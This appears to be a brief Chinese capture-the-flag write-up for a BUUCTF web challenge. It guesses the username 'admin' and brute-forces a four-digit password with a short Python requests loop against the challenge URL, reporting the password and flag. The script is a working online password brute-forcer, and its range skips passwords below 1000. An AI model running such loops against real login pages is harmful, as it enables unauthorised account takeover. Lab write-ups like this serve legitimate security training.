打开指定网页后,先猜测账号,可以得出账号为admin,接着看着密码,可知密码为4位的数字,我们使用python书写简单的脚本对其进行暴力破解
得出,密码为:6490
得出flag
import requests
if __name__ == '__main__':
for i in range(1000, 9999):
print("破解到:"+str(i))
ret = requests.get("http://1b5fd7cb-4c94-4bb7-928e-a9fa51c1de6e.node4.buuoj.cn:81/?username=admin&password=" + str(i)).text
if ret != "密码错误,为四位数字。":
print(ret)
print("密码为:" + str(i))
break